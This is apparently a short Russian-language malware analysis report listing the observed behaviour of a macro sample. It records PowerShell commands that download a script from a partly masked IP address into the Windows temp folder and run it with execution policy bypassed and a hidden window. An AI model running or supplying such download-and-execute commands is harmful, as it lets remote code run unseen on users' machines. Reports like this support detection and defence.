Техническая информация
- http://19#.#68.43.93/poc/macro-powershell.ps1 как %windir%\temp\macro-powershell.ps1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -File %WINDIR%\Temp\Macro-Powershell.ps1
- '<LOCALNET>.43.93':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass $e=(New-Object System.Net.WebClient).DownloadFile('http://19#.#68.43.93/PoC/Macro-Powershell.ps1','%WINDIR%\Temp\Macro-Powershell.ps1') (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -File %WINDIR%\Temp\Macro-Powershell.ps1 (со скрытым окном)